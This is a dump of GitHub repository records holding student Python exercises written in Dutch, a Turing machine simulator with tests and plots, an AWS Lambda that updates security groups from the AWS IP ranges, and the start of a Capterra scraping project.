0.6487804651260376, "alphanum_fraction": 0.6487804651260376, "avg_line_length": 33, "blob_id": "0b12975d4bc3aba1f219708d7f4c2e6626beb81b", "content_id": "fea5eca302deacbe6c26e70e6e6f019da46d52ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 86, "num_lines": 6, "path": "/Opdrachten/1.3. input output.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "uurloon = float(input('Wat verdien je per uur: '))\naantalUur = int(input(\"Hoeveel uur heb je gewerkt: \"))\n\nx = str(aantalUur) + (\" uur werken levert \") + str(uurloon * aantalUur) + (\" euro op\")\n\nprint(x)\n\n" }, { "alpha_fraction": 0.6549295783042908, "alphanum_fraction": 0.672535240650177, "avg_line_length": 19.071428298950195, "blob_id": "9b8377aabd81b06fe84c2f4905328989864e9fe6", "content_id": "5e2689b98869968111a3ca8b41ce3a47629e06a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 44, "num_lines": 14, "path": "/Opdrachten/5.0 Functie met list-parameter en for-loop.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def kwadraten_som(grondgetallen):\n return sum(grondgetallen)\n\n\ngrondgetallen = []\n\nfor even in range(0, 5):\n nummers = int((input('Geef nummers: ')))\n if nummers % 2 == 0:\n grondgetallen.append(nummers**2)\n\n\nprint(grondgetallen)\nprint(kwadraten_som(grondgetallen))\n\n\n\n" }, { "alpha_fraction": 0.47699758410453796, "alphanum_fraction": 0.48426151275634766, "avg_line_length": 23.352941513061523, "blob_id": "457bd9289422a3c3c86dacf09b429423f604a130", "content_id": "5c29d10bce91e2d352a7d006313d822960e31468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Opdrachten/7.5. Dict & functions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "dict = {}\ndef namen():\n while True:\n deNamen = input(\"Volgende naam: \")\n if deNamen == \"\":\n break\n elif deNamen not in dict:\n dict[deNamen] = 1\n else:\n dict[deNamen] += 1\nnamen()\n\nfor x in dict:\n if dict[x] == 1:\n print(\"Er is \", dict[x], \"student met de naam \", x)\n else:\n print(\"Er zijn \", dict[x], \"studenten met de naam \", x)" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.6100917458534241, "avg_line_length": 26, "blob_id": "ecde604a5b2daec95a2bca598c0cb189a2e3d686", "content_id": "6140ff3e50fd27a1134342c189d10b5e88da16c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 55, "num_lines": 8, "path": "/Opdrachten/3.0 functie met if.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def lang_genoeg(lengte):\n if lengte >= str('120'):\n print('Je bent lang genoeg voor de attractie!')\n else:\n print('Sorry, je bent te klein')\n\n\ngeefLengte = lang_genoeg (input('Geef je lengte: '))\n\n\n" }, { "alpha_fraction": 0.6544502377510071, "alphanum_fraction": 0.6596858501434326, "avg_line_length": 32.260868072509766, "blob_id": "eff0e8509693093d1203b1ea4a3516fe9a69db51", "content_id": "9a81d056487353d264ad91aa25920a2e7e679abd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 764, "license_type": "no_license", "max_line_length": 102, "num_lines": 23, "path": "/Opdrachten/8.4. CSV-files met headers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\n\nartikelPrijs = 0\nartikelNaam = ''\nvoorraad = 0\nproductnummer = 0\ntotalVoorraad = 0\nwith open('producten.csv','r') as productenFile:\n reader = csv.DictReader(productenFile, delimiter=';')\n for row in reader:\n totalVoorraad += int(row['voorraad'])\n if float(row['prijs']) > float(artikelPrijs):\n artikelPrijs = row['prijs']\n artikelNaam = row['naam']\n elif int(voorraad) < int(row['voorraad']):\n voorraad = int(voorraad) + int(row['voorraad'])\n productnummer = row['artikelnummer']\n\n\nprint(\"Het duurste artikel is\", artikelNaam, 'en die kost', artikelPrijs)\nprint(\"Er zijn slechts\", voorraad, \"exemplaren in voorraad van het product met nummer\", productnummer)\nprint(totalVoorraad)" }, { "alpha_fraction": 0.6043956279754639, "alphanum_fraction": 0.6087912321090698, "avg_line_length": 18.69565200805664, "blob_id": "a6365ebb266aa23d8942da0e2cf70cd8cdffcdba", "content_id": "a194be26b833b246633e504caedff0b21b63bd5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 48, "num_lines": 23, "path": "/Opdrachten/7.4. File & dict.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "file = open(\"ticker.txt\",\"r\")\n\ndict = {}\n\ndef ticker():\n for lines in file:\n bedrijf = str(lines.split(\":\")[0])\n symbool = str(lines.split(\":\")[1])\n dict[bedrijf] = symbool\n\nticker()\n\nwhile True:\n enterCompany = input(\"Enter company name: \")\n company = dict[enterCompany]\n print(\"Ticker symbool:\", company)\n break\n\n\n\nenterSymbool = input(\"Enter Ticker Symbool: \")\nif enterSymbool in dict.values():\n print(\"Check\")\n\n\n" }, { "alpha_fraction": 0.6016677618026733, "alphanum_fraction": 0.6234765648841858, "avg_line_length": 29.58823585510254, "blob_id": "e89914dd4d2bca189e857bbdd2e9591776ae1f25", "content_id": "2126a9e6ee53220231cb691b932e7cf040f5e4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1559, "license_type": "no_license", "max_line_length": 127, "num_lines": 51, "path": "/Opdrachten/Final assignment Bagagekluizen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "print(\"1: Ik wil weten hoeveel kluizen nog vrij zijn \\n2: Ik wil een nieuwe kluis \\n3: Ik wil even iets uit mijn kluis halen \")\n\nkeuze = (int((input(\"Kies uit optie 1, 2 of 3: \"))))\n\n\nfile = open(\"kluizen.txt\",\"r+\")\n\ndef toon_aantal_kluizen_vrij():\n lines = sum(1 for line in file)\n linesRemaining = 12 - lines\n print(\"Er zijn nog:\", linesRemaining, \"kluizen vrij\")\n\n\ndef nieuwe_kluis():\n kluisnummers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n for lines in file:\n deKluisnummers = int(lines.split(\";\")[0])\n if deKluisnummers in kluisnummers:\n kluisnummers.remove(deKluisnummers)\n if len(kluisnummers) > 0:\n wachtwoord = (input(\"Geef een code voor uw kluisje: \"))\n file.write((str(kluisnummers[0]) + \";\" + str(wachtwoord) + \"\\n\"))\n print(\"u heeft kluisnummer: \" + str(kluisnummers[0]))\n elif len(kluisnummers) == 0:\n print(\"Er zijn geen kluisjes meer beschikbaar\")\n\ndef kluis_openen():\n geefKluisnummer = input(\"Geef uw kluisnummer: \")\n geefWachtwoord = input(\"Geef uw wachtwoord: \")\n for lines in file:\n jeKluisnummer = lines.split(\";\")[0]\n jeWachtwoord = lines.split(\";\")[1]\n if geefKluisnummer in jeKluisnummer and geefWachtwoord in jeWachtwoord:\n print(\"Uw kluisje is geopent\")\n break\n else:\n print(\"combinatie incorrect\")\n\n\n\nif keuze == 1:\n toon_aantal_kluizen_vrij()\nelif keuze == 2:\n nieuwe_kluis()\nelif keuze == 3:\n kluis_openen()\nelse:\n print(\"ERROR Deze optie is niet beschikbaar\")\n\n\nfile.close()" }, { "alpha_fraction": 0.6194690465927124, "alphanum_fraction": 0.6194690465927124, "avg_line_length": 21.200000762939453, "blob_id": "ccb5e26c0b722816de3f9baff48e34a9144ebc27", "content_id": "3e02d3026069838d78cd1423a06116dd27e5e27d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 50, "num_lines": 5, "path": "/Opdrachten/6. For, If & vowels.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "s = \"Guido van Rossum heeft programmeertaal Python bedacht.\"\n\nfor even in s:\n if even in 'aeiou':\n print(even)\n\n\n" }, { "alpha_fraction": 0.60502690076828, "alphanum_fraction": 0.60502690076828, "avg_line_length": 31.764705657958984, "blob_id": "e87c147326acdc4d6bf06374c0ac6b02a9e03532", "content_id": "a813cefcda2b7ed6ffdd2d9f35d927b94c492775", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 557, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Opdrachten/8.2 CSV-files schrijven.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import datetime\nimport csv\nmydate = datetime.datetime.now()\nwith open('inloggers.csv', 'w', newline='') as bestand:\n writer = csv.writer(bestand, delimiter=';')\n writer.writerow(('datum','naam','voorl','gbdatum','email'))\n\n\n while True:\n naam = input(\"Wat is je achternaam? \")\n if naam == \"einde\":\n break\n voorl = input(\"Wat zijn je voorletters? \")\n gbdatum = input(\"Wat is je geboortedatum? \")\n email = input(\"Wat is je e-mail adres? \")\n\n writer.writerow((mydate, naam, voorl, gbdatum, email))\n" }, { "alpha_fraction": 0.6103448271751404, "alphanum_fraction": 0.6103448271751404, "avg_line_length": 25.454545974731445, "blob_id": "4d8ea926318b24b926028bab1a703470f0b706d1", "content_id": "f7d2558d83361202cb00b1772aec8732498db9d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 48, "num_lines": 11, "path": "/Opdrachten/4. Files schrijven.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import datetime\ndef strftime():\n vandaag = datetime.datetime.today()\n s = vandaag.strftime(\"%a %d %b %Y %H:%M:%S\")\n return (s)\n\ndatum = strftime()\nnaam = input(\"Naam hardloper: \")\nrunners = open(\"Hardlopers.txt\", \"a+\")\nrunners.write(datum + \" \" + naam + \" \" + \"\\n\")\nrunners.close()" } ]
31
marekq/aws-ip-ranges
https://github.com/marekq/aws-ip-ranges
9561464735b7468b833e6619ec5ddaf549b7215b
2dcd25a9eb0bc84be39e199827f0c6df35ced69a
f53addfaaefaaa2cc8a0b200a69e07bdf25f3e8e
refs/heads/master
2020-04-12T03:59:46.060831
2019-05-26T23:22:05
2019-05-26T23:22:05
162,281,495
4
0
null
null
null
null
null
[ { "alpha_fraction": 0.5998824834823608, "alphanum_fraction": 0.6139835715293884, "avg_line_length": 25.200000762939453, "blob_id": "91fddef7c70ec35165f062908bfeaad3daa7777d", "content_id": "41ab522a527f4d526123697c1788581da9cb7ff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 131, "num_lines": 65, "path": "/lambda_function.py", "repo_name": "marekq/aws-ip-ranges", "src_encoding": "UTF-8", "text": "import boto3, json, os\nfrom botocore.vendored import requests\nfrom netaddr import *\n\nec2 \t\t\t= boto3.client('ec2')\nport\t\t\t\t= 443\nproto\t\t\t\t= 'tcp'\n\ndef main(sgname, sgjson):\n\tc \t= int(0)\n\ts1\t\t\t= []\n\ts2\t\t\t= []\n\tsg_list \t= []\n\tsupernet\t= []\n\tjson_list\t= []\n\tsg_id\t\t= ''\n\n\ttry:\n\t\tsg \t= ec2.describe_security_groups(Filters=[{'Name': 'tag:dnsservice', 'Values': [sgname]}])['SecurityGroups']\n\n\texcept:\n\t\tsg\t\t= []\n\n\tfor z in sg:\n\t\tsg_id\t= z['GroupId']\n\t\tfor a in z['IpPermissions']:\n\t\t\tfor b in a['IpRanges']:\n\t\t\t\tsg_list.append(b['CidrIp'])\n\t\t\t\t\n\tfor y in json.loads(sgjson.text)['prefixes']:\n\t\tif y['service'] == sgname:\n\t\t\tjson_list.append(y['ip_prefix'])\n\t\t\tc += int(1)\n\n\tfor y in IPSet(json_list).iter_cidrs():\n\t\ts1.append(str(y))\n\t\t\n\ts2\t= cidr_merge(s1)\n\tfor y in s2:\n\t\tsupernet.append(str(y))\n\n\tprint('{0: <20}'.format(sgname)+' \\t '+str(len(json_list))+' sgs reduced to '+str(len(supernet))+' sgs')\n\n\tif sg_id != '':\n\t\tfor sg in sg_list:\n\t\t\tif sg not in supernet:\n\t\t\t\tec2.revoke_security_group_ingress(GroupId = sg_id, IpProtocol = proto, CidrIp = sg, FromPort = int(port), ToPort = int(port))\n\t\t\t\tprint(sg_id+' removing '+sg)\n\t\t\n\t\tfor y in supernet:\t\t\n\t\t\tif y not in sg_list:\n\t\t\t\tec2.authorize_security_group_ingress(GroupId = sg_id, IpProtocol = proto, CidrIp = y, FromPort = int(port), ToPort = int(port))\n\t\t\t\tprint(sg_id+' adding '+y)\n\t\n\t\tprint('{0: <20}'.format(sgname)+' \\t '+str(len(supernet)), 'items in '+str(sg_id))\n\ndef lambda_handler(event, context):\n\tserv\t= []\n\tsgjson\t= requests.get('https://ip-ranges.amazonaws.com/ip-ranges.json')\n\tfor y in json.loads(sgjson.text)['prefixes']:\n\t\tif y['service'] not in serv:\n\t\t\tserv.append(y['service'])\n\n\tfor s in serv:\n\t\tmain(s, sgjson)" }, { "alpha_fraction": 0.7693677544593811, "alphanum_fraction": 0.7773820161819458, "avg_line_length": 43.939998626708984, "blob_id": "2e0ea96b1246a692ce51dd48de7b906722214815", "content_id": "c370c57e48e1a6c0ee18ce68710068d6954608db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2246, "license_type": "no_license", "max_line_length": 322, "num_lines": 50, "path": "/readme.md", "repo_name": "marekq/aws-ip-ranges", "src_encoding": "UTF-8", "text": "aws-ip-ranges\n=============\n\nA Lambda function to automatically create security groups for the address ranges of CloudFront, Route 53 Healthchecks and other AWS services. This can be helpful in case you want to grant access to your EC2 instances from only one of these services and want to have direct control over which security groups are updated. \n\nSince the IP address ranges change on regular basis and I'm leveraging several of these services, I found this the simplest way to manage security groups. By default it runs once per hour by default and can whitelist IP ranges for any of the following AWS services (as of December 2018);\n\n- AMAZON\n- AMAZON_CONNECT\n- CLOUD9\n- CLOUDFRONT\n- CODEBUILD\n- EC2\n- GLOBALACCELERATOR\n- ROUTE53\n- ROUTE53_HEALTHCHECKS\n- S3\n\nThe function retrieves the AWS IP ranges from the official JSON document containing updates; https://ip-ranges.amazonaws.com/ip-ranges.json .\n\nThe function can be considered an alternative to the SNS based function available on the CloudFront GitHub; https://github.com/aws-samples/aws-cloudfront-samples/tree/master/update_security_groups_lambda \n\nInstallation\n------------\n\nUse the attached CloudFormation template to deploy the function to Lambda. Next, you should tag all the security groups which should be automatically refreshed with one of the service names mentioned in the AWS JSON file; \n\n\n![alt tag](https://raw.githubusercontent.com/marekq/aws-ip-ranges/master/docs/1.png)\n\n\nWhen you now invoke the Lambda function, the logs should display the address ranges that are added or removed from the security groups;\n\n\n![alt tag](https://raw.githubusercontent.com/marekq/aws-ip-ranges/master/docs/2.png)\n\n\nTo-do list\n---------\n\n- Add IPv6 support for security groups, currently only IPv4 ranges will be updated. \n- Integrate SNS as a trigger for the Lambda so that changes in IP ranges can be detected faster. \n- Add a simpler way to change the security group port and add UDP support.\n- Add support for whitelisting PrivateLink connections available to in the VPC. \n- Add support for whitelisting custom ranges other than from AWS (i.e. a companies private/public IP ranges).\n\nContact\n-------\n\nIn case of questions or bugs, please raise an issue or reach out to @marekq!" } ]
2
WarleiCanuto/MT
https://github.com/WarleiCanuto/MT
d51fa38b2a0fe42e692b9445f287ab42f4177619
b827dec4686fa6316011fb973972ac2891bc6848
7506d324b1462e63aecf8863df09d43679d0ea34
refs/heads/main
2023-05-10T09:51:02.390960
2021-05-28T13:12:35
2021-05-28T13:12:35
371,117,562
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6765432357788086, "alphanum_fraction": 0.7160493731498718, "avg_line_length": 29.30769157409668, "blob_id": "40761107ec2ae3060dea4927715d71b28c07be45", "content_id": "9fa473c62e45654e14777720e16b97eae0e00f07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/graf.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot\r\nfrom MT import plot\r\n\r\ndata_it, data_tam, data_plvrs, data0, data1 = plot()\r\nprint(data_it)\r\nprint(data_tam)\r\npyplot.scatter(data_tam, data_it)\r\n#pyplot.plot(data0, 'r') #Numero de 0s VERMELHO (*10000)\r\n#pyplot.plot(data1, 'g') #Numero de 1s VERDE (*10000)\r\npyplot.title('Gráfico de Dispersão')\r\npyplot.ylabel(\"Iterações\")\r\npyplot.xlabel(\"Tamanho da Palavra\")\r\npyplot.show()" }, { "alpha_fraction": 0.6418439745903015, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26.299999237060547, "blob_id": "f0493e205f21b63737887eb8c6a60d8ed5b2804b", "content_id": "6efc8d761e2b1cf5dea58c066fe402279330dbf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/unitt.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "import unittest\r\nimport random\r\nfrom MT import aceitacao\r\npalavras_teste = []\r\n\r\n#palavras_teste.append('1100') Reprovada\r\n#Quando o numero de 1s é maior ou igual a 6 o tempo de execução é alto\r\n\r\nfor p in range(20):\r\n palavras_teste.append('0'*random.randint(1, 5) + '1'*random.randint(1, 5))\r\nprint(palavras_teste)\r\n\r\nclass FuncTeste(unittest.TestCase):\r\n def test_aceitacao(self):\r\n for p in palavras_teste:\r\n self.assertTrue(aceitacao(p))\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n #Lembrar de remover os prints para testar" }, { "alpha_fraction": 0.3257015347480774, "alphanum_fraction": 0.3854643702507019, "avg_line_length": 34.71120834350586, "blob_id": "e36b59e1eedc00795efec73e912e6a967b2c6b0d", "content_id": "e1d77c6c84c5b3a58f094e3a46bc082b0a3d2b06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8528, "license_type": "no_license", "max_line_length": 213, "num_lines": 232, "path": "/MT.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "import random\r\nfrom numpy import mean\r\nfrom numpy import std\r\nfrom numpy import correlate\r\nfrom numpy.random import randn\r\nfrom numpy.random import seed\r\nfrom matplotlib import pyplot\r\n\r\nQ={'q0', 'q1','q2','q3','q4','q5','q6','q7','q8','q9','q10','q11','q12','q13','q14','q15','q16','q17','q18','q19','q20','q21','q22','q23', 'q24','q25','q26','q27','q28','q29','q30','q31','q32', 'q33','q34', 'q35'}\r\nS={'0', '1'}\r\nG={'0','1', 'X', 'Y', 'A', 'B', '.',' '}\r\nF={'q12', 'q25', 'q29','q30', 'q33', 'q35'}\r\nD={\r\n ('q0', '1'):('q0','1','R'),\r\n ('q0', '0'):('q0','0','R'),\r\n ('q0', 'Y'):('q0','Y','R'),\r\n ('q0', 'A'):('q0','A','R'),\r\n ('q0', '.'):('q0','.','R'),\r\n ('q0', ' '):('q1','.','L'),\r\n ('q1', ' '):('q7',' ','R'),\r\n ('q1', 'A'):('q1','A','L'),\r\n ('q1', '0'):('q1','0','L'),\r\n ('q1', 'Y'):('q1','Y','L'),\r\n ('q1', '.'):('q1','.','L'),\r\n ('q1', '1'):('q2','Y','L'),\r\n ('q2', '1'):('q2','1','L'),\r\n ('q2', '0'):('q3','X','R'),\r\n ('q3', ' '):('q4','A','L'),\r\n ('q3', 'Y'):('q3','Y','R'),\r\n ('q3', 'X'):('q3','X','R'),\r\n ('q3', '.'):('q3','.','R'),\r\n ('q3', 'A'):('q3','A','R'),\r\n ('q3', '1'):('q3','1','R'),\r\n ('q4', '1'):('q4','1','L'),\r\n ('q4', 'A'):('q4','A','L'),\r\n ('q4', 'Y'):('q4','Y','L'),\r\n ('q4', '.'):('q4','.','L'),\r\n ('q4', 'X'):('q4','X','L'),\r\n ('q4', '0'):('q3','X','R'),\r\n ('q4', ' '):('q5',' ','R'),\r\n ('q5', 'X'):('q5','0','R'),\r\n ('q5', '1'):('q6','1','L'),\r\n ('q5', 'Y'):('q6','Y','L'),\r\n ('q6', '0'):('q6','0','L'),\r\n ('q6', ' '):('q0',' ','R'),\r\n ('q7', '0'):('q7',' ','R'),\r\n ('q7', 'Y'):('q7',' ','R'),\r\n ('q7', '.'):('q7',' ','R'),\r\n ('q7', 'A'):('q8','A','L'),\r\n ('q8', ' '):('q9',' ','R'),\r\n ('q9', 'A'):('q9','A','R'),\r\n ('q9', '.'):('q10','.','R'),\r\n ('q10', ' '):('q11',' ','L'),\r\n ('q10', 'A'):('q13','A','L'),\r\n ('q11', 'A'):('q11','0','L'),\r\n ('q11', '.'):('q11',' ','L'),\r\n ('q11', ' '):('q12',' ','R'),\r\n ('q13', '.'):('q13','.','L'),\r\n ('q13', 'A'):('q13','A','L'),\r\n ('q13', ' '):('q14',' ','R'),\r\n ('q14', 'A'):('q15',' ','R'),\r\n ('q14', '.'):('q20',' ','R'),\r\n ('q15', 'A'):('q15','A','R'),\r\n ('q15', '.'):('q16','.','R'),\r\n ('q16', '.'):('q19','.','L'),\r\n ('q16', 'A'):('q17','B','R'),\r\n ('q17', 'A'):('q17','A','R'),\r\n ('q17', 'B'):('q17','B','R'),\r\n ('q17', '.'):('q17','.','R'),\r\n ('q17', ' '):('q18','A','L'),\r\n ('q18', 'A'):('q18','A','L'),\r\n ('q18', '.'):('q18','.','L'),\r\n ('q18', 'B'):('q16','B','R'),\r\n ('q19', 'B'):('q19','A','L'),\r\n ('q19', '.'):('q19','.','L'),\r\n ('q19', 'A'):('q19','A','L'),\r\n ('q19', ' '):('q14',' ','R'),\r\n ('q20', 'A'):('q20',' ','R'),\r\n ('q20', '.'):('q21',' ','R'),\r\n ('q21', '.'):('q21','.','R'),\r\n ('q21', 'A'):('q21','A','R'),\r\n ('q21', ' '):('q22','.','L'),\r\n ('q22', 'A'):('q22','A','L'),\r\n ('q22', '.'):('q23','.','L'),\r\n ('q23', '.'):('q23','.','L'),\r\n ('q23', 'A'):('q23','A','L'),\r\n ('q23', ' '):('q14',' ','R'),\r\n ('q22', ' '):('q24',' ','R'),\r\n ('q24', 'A'):('q24','0','R'),\r\n ('q24', '.'):('q25',' ','L'),\r\n ('q26', '1'):('q27','1','R'),\r\n ('q26', ' '):('q30','0','R'),\r\n ('q26', '0'):('q31','0','R'),\r\n ('q27', '1'):('q27','1','R'),\r\n ('q27', ' '):('q28',' ','L'),\r\n ('q27', '0'):('q35','0','R'),\r\n ('q28', '1'):('q28',' ','L'),\r\n ('q28', ' '):('q29',' ','R'),\r\n ('q31', ' '):('q32',' ','L'),\r\n ('q31', '1'):('q34','1','R'),\r\n ('q31', '0'):('q31','0','R'),\r\n ('q32', '0'):('q32',' ','L'),\r\n ('q32', ' '):('q33','0','R'),\r\n ('q34', '0'):('q35','0','R'),\r\n ('q34', '1'):('q34','1','R'),\r\n ('q34', ' '):('q36',' ','L'),\r\n ('q36', '0'):('q36','0','L'),\r\n ('q36', '1'):('q36','1','L'),\r\n ('q36', ' '):('q0',' ','R'),\r\n}\r\nMT = (Q, S, G, D, 'q26',' ', F)\r\n\r\npalavra = '001100'\r\n\r\n#PLOT\r\npalavra_y = []\r\npalavra_x = []\r\npalavra_plot = []\r\ndata_iteracoes = []\r\ndata_tam_plvr = []\r\n\r\ndef aceitacao(plvr):\r\n if analisaPalavra_testes(MT, plvr):\r\n return True\r\n else:\r\n return False\r\n\r\ndef plot():\r\n for p in range(20):\r\n palavra = ('1'*random.randint(1, 5) + '0'*random.randint(1, 5))\r\n palavra_x.append(palavra.count('0')*10000)\r\n palavra_y.append(palavra.count('1')*10000)\r\n palavra_plot.append(palavra)\r\n data_tam_plvr.append(len(palavra))\r\n analisaPalavra_testes(MT, palavra)\r\n return data_iteracoes, data_tam_plvr, palavra_plot, palavra_x, palavra_y\r\n\r\ndef analisaPalavra(maquina, palavra):\r\n estados_finais = maquina[6]\r\n estado_inicial = maquina[4]\r\n direcao = ''\r\n palavra_final = ''\r\n palavra_list = list(palavra)\r\n i = 0\r\n estado_atual = estado_inicial\r\n palavra_completa = False\r\n iteracoes = 0\r\n print('Palavra: ', palavra,'\\n')\r\n\r\n while palavra_completa == False:\r\n for estadof in estados_finais:\r\n if estadof!= 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n print('A palavra '+ palavra + ' foi aceita em ' + str(iteracoes) + ' iterações') \r\n print('Palavra final: ' + palavra_final.join(palavra for palavra in palavra_list if palavra != ' '))\r\n return True\r\n elif estadof == 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n print('A palavra '+ palavra + ' foi rejeitada em ' + str(iteracoes) + ' iterações por não estar no formato 0^a1^b')\r\n return False\r\n for delta in maquina[3]:\r\n if (i + 1) > len(palavra_list):\r\n palavra_list.append(' ') \r\n if i < 0:\r\n palavra_list = [' '] + palavra_list\r\n i = 0\r\n if estado_atual == delta[0] and palavra_list[i] == delta[1]:\r\n iteracoes += 1\r\n transicao = maquina[3][delta]\r\n simbolo_ant = palavra_list[i]\r\n palavra_list[i] = transicao[1]\r\n if transicao[2] == 'R':\r\n direcao = 'direita'\r\n i += 1\r\n else:\r\n direcao = 'esquerda'\r\n i -= 1\r\n if estado_atual != transicao[0]:\r\n print('Sai do estado ' + estado_atual + ' para o estado ' + transicao[0] + ' trocando o simbolo ' + simbolo_ant + ' pelo símbolo' + transicao[1] + ' em direção a ' + direcao)\r\n print('\\nFita:', palavra_list, '\\n')\r\n estado_atual = transicao[0]\r\n break\r\n elif estado_atual == transicao[0]:\r\n print('Permanece no ' + estado_atual + ' lê o simbolo ' + simbolo_ant + ' e anda em direção a ' + direcao)\r\n print('\\nFita:', palavra_list, '\\n')\r\n break\r\n\r\n#Sem prints\r\ndef analisaPalavra_testes(maquina, palavra):\r\n estados_finais = maquina[6]\r\n estado_inicial = maquina[4]\r\n direcao = ''\r\n palavra_final = ''\r\n palavra_list = list(palavra)\r\n i = 0\r\n estado_atual = estado_inicial\r\n palavra_completa = False\r\n iteracoes = 0\r\n print('Palavra: ', palavra,'\\n')\r\n\r\n while palavra_completa == False:\r\n for estadof in estados_finais:\r\n if estadof!= 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n data_iteracoes.append(iteracoes) #PLOT\r\n return True\r\n elif estadof == 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n data_iteracoes.append(iteracoes) #PLOT\r\n return False\r\n for delta in maquina[3]:\r\n if (i + 1) > len(palavra_list):\r\n palavra_list.append(' ') \r\n if i < 0:\r\n palavra_list = [' '] + palavra_list\r\n i = 0\r\n if estado_atual == delta[0] and palavra_list[i] == delta[1]:\r\n iteracoes += 1\r\n transicao = maquina[3][delta]\r\n simbolo_ant = palavra_list[i]\r\n palavra_list[i] = transicao[1]\r\n if transicao[2] == 'R':\r\n direcao = 'direita'\r\n i += 1\r\n else:\r\n direcao = 'esquerda'\r\n i -= 1\r\n if estado_atual != transicao[0]:\r\n estado_atual = transicao[0]\r\n break\r\n elif estado_atual == transicao[0]:\r\n break\r\n" } ]
3
winnerineast/capterra
https://github.com/winnerineast/capterra
ec1b5c241f8782d1c0455f49be2abd15ce0574cc
382d510284a6881f921ad55f46083744c5963a2b
7d092b1f840eb4aa99bf74c795d03f972d950306
refs/heads/master
2023-06-29T06:57:11.566398
2021-07-17T15:33:13
2021-07-17T15:33:13
386,955,739
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7537993788719177, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 41.956520080566406, "blob_id": "7fd5cf431d76f1bf611ecb86bd673b6f1f559b93", "content_id": "d9acdd55319a34717d542e8b5fc91c9c2ad533d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 987, "license_type": "no_license", "max_line_length": 120, "num_lines": 23, "path": "/README.md", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "# Capterra Clone\nthis is project to create a clone database of capterra website.\n\n## How to use\n\n- The project can only run on Ubuntu. (we tested in Ubuntu 18.04)\n- Install mySQL database.\n- Install mysql-connector for python. \n- Update username and password in create_database.py.\n- Run create_database.py to setup empty database for capterra.\n- Run main.py to synchronize the online website with local database.\n- main.py has the following features:\n * automatically detect the software categories by name of category\n * automatically detect the software by name of software\n * both category and software information will be overridden (!!!)\n * No overridden for review data and only appending\n \n- (incoming) a local website to read local database\n\n## Work Daily\n- 2021.07.17\ncompleted create_database.py and simple webpage download and interpretation. now it's going to develop download webpage \n and insert them into database (so far don't do existing data detection)" }, { "alpha_fraction": 0.5989025831222534, "alphanum_fraction": 0.6126200556755066, "avg_line_length": 35.089107513427734, "blob_id": "b69da9455a98a6211e18918439723f4f81878d9c", "content_id": "113da616f0d3b1c2043e3110303f06df726af0f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3645, "license_type": "no_license", "max_line_length": 153, "num_lines": 101, "path": "/main.py", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "import requests\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport json\nimport mysql.connector\nfrom mysql.connector import errorcode\n\n\nconfig = dict(user='root',\n password='1',\n host='127.0.0.1',\n database='capterra',\n raise_on_warnings=True,\n use_pure=True)\n\n\ndef start_requests(input_url):\n r = requests.get(input_url)\n return r.content\n\n\ndef parse_directory(html_text):\n soup = BeautifulSoup(html_text, 